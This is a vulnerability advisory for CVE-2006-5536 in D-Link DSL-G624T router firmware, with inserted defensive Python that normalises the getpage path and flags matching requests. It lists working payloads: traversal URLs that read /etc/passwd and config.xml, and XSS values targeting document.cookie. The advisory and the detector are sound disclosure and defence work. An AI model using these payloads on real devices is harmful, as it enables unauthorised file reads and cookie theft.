
CVE-2006-5536: D-Link DSL-G624T several vulnerabilities

Jose Ramon Palanco · Oct 26, 2006

Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter.

Researcher

José Ramón Palanco: jpalanco@gmail.com

Details

Vulnerabilities

Directory traversal

Examples:

http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting

Affected url: http://router/cgi-bin/webcm

Method  Variable                      Value
POST    upnp%3Asettings%2Fstate       >"><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST    upnp%3Asettings%2Fconnection  >"><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST    upnp%3Asettings%2Fconnection  "+onmouseover="alert(document.cookie)

Directory listing

Affected: /cgi-bin directory
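The three findings above can be checked from the defending side with a small amount of code. The following is an added example and not part of the advisory or of D-Link's firmware: a hardened resolver for the webcm getpage parameter that refuses the traversal values shown above, and a request classifier that labels traffic matching the traversal, cross-site scripting and /cgi-bin listing patterns. It assumes a web root of /www, a policy that getpage names a file relative to that root, and a constructed list of sample requests built from the advisory's own examples.

```python
# Added example, not part of the advisory: a hardened resolver for the
# webcm "getpage" parameter and a request classifier for the three findings.
# Assumptions (not from the page): the web root is /www, getpage is meant to
# name a file relative to that root, and the sample requests are constructed.
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/www"  # assumed document root of the router's web server

# an event-handler attribute or a <script> tag inside a submitted value
SCRIPT_RE = re.compile(r"<\s*script|\bon[a-z]+\s*=", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded
    %252e%252e is seen as '..' rather than slipping past a one-pass filter."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_getpage(value, web_root=WEB_ROOT):
    """Return the path the handler may read, or None when the value must be
    refused. Policy: decode, normalise, then reject absolute paths, NUL bytes
    and anything that still climbs above the root, so '/./././etc/passwd'
    and 'a/../../etc/passwd' are both refused while 'html/../status.html'
    resolves to /www/status.html."""
    decoded = fully_decode(value)
    if "\x00" in decoded:
        return None
    normalised = posixpath.normpath(decoded)
    if normalised in ("", "."):
        return None
    if normalised.startswith("/") or normalised == ".." or normalised.startswith("../"):
        return None
    return posixpath.join(web_root, normalised)


def classify_request(method, url, body=""):
    """Label one request with the advisory findings it matches:
    'traversal', 'xss' and/or 'dirlisting'."""
    findings = []
    parts = urlsplit(url)
    if parts.path == "/cgi-bin/webcm":
        for raw in parse_qs(parts.query, keep_blank_values=True).get("getpage", []):
            if resolve_getpage(raw) is None:
                findings.append("traversal")
        if method.upper() == "POST":
            for name, values in parse_qs(body, keep_blank_values=True).items():
                if name.startswith("upnp:settings/") and any(
                    SCRIPT_RE.search(fully_decode(v)) for v in values
                ):
                    findings.append("xss")
    elif parts.path.rstrip("/") == "/cgi-bin":
        findings.append("dirlisting")
    return findings


# Constructed sample traffic: one benign request, the advisory's own payloads
# (URL-encoded for the POST bodies), and a /cgi-bin/ listing request.
SAMPLE_REQUESTS = [
    ("GET", "/cgi-bin/webcm?getpage=html/status.html", ""),
    ("GET", "/cgi-bin/webcm?getpage=/./././././././etc/passwd", ""),
    ("GET", "/cgi-bin/webcm?getpage=/./././././././etc/config.xml", ""),
    ("POST", "/cgi-bin/webcm",
     "upnp%3Asettings%2Fstate=%3E%22%3E%3CScRiPt%3Ealert(document.cookie)%3B%3C%2FScRiPt%3E"),
    ("POST", "/cgi-bin/webcm",
     "upnp%3Asettings%2Fconnection=%22+onmouseover%3D%22alert(document.cookie)"),
    ("GET", "/cgi-bin/", ""),
]


def audit(requests=SAMPLE_REQUESTS):
    """Run the classifier over a request list and keep only flagged entries."""
    flagged = []
    for method, url, body in requests:
        labels = classify_request(method, url, body)
        if labels:
            flagged.append((method, url, labels))
    return flagged


if __name__ == "__main__":
    for method, url, labels in audit():
        print(method, url, ",".join(labels))
```

The resolver refuses the advisory's `/./././etc/passwd` form because normalisation turns it into an absolute path, and refuses a `..` form because the normalised result still begins with `../`; a plain substring filter for `..` would pass the first and a single-pass decoder would pass an encoded second, which is why both steps are kept.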

Products and Versions

  • Vendor: D-LINK
  • Product: DSL-G624T
  • Version: V3.00B01T01.YA-C.20060616

CPE v2.3

cpe:2.3:h:d-link:dsl-g624t:firmware_3.00b01t01.ya_c.2006-06-16:::::::*

CVSS Scores & Vulnerability Types

CVSS Score: 5.0
Confidentiality Impact: Partial (There is considerable informational disclosure.)
Integrity Impact: None (There is no impact to the integrity of the system.)
Availability Impact: None (There is no impact to the availability of the system.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit.)
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
Gained Access: None
Vulnerability Type(s): Directory traversal
CWE ID: CWE id is not defined for this vulnerability


Written by Jose Ramon Palanco
Jose Ramón Palanco has held CEO/CTO positions at EpicBounties since June 2021. In 2014 he founded Dinoflux, a Threat Intelligence startup acquired by Telefonica, and he has worked for 11paths since 2018. He also worked in the R&D department at Ericsson and at Optenet (Allot). He studied Telecommunications Engineering at the University of Alcala de Henares and holds a Master of IT Governance from the University of Deusto. He has been a speaker at OWASP, ROOTEDCON, ROOTCON, MALCON, and FAQin, among others. He has published several CVEs and various open source cybersecurity tools such as nmap-scada, ProtocolDetector, escan, pma, EKanalyzer and SCADA IDS.